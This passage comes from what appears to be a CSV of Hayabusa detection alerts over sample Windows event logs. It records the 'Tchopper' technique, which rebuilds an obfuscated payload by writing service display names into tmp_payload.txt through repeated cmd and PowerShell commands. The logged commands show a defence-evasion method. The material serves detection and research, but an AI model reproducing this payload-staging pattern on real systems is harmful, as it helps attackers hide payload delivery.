tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:34:27.978 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:27.993 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:35.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:35.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:38.274 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:38.290 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:42.635 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:42.651 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:48.467 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:48.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:54.271 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:54.287 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:00.089 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:00.104 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 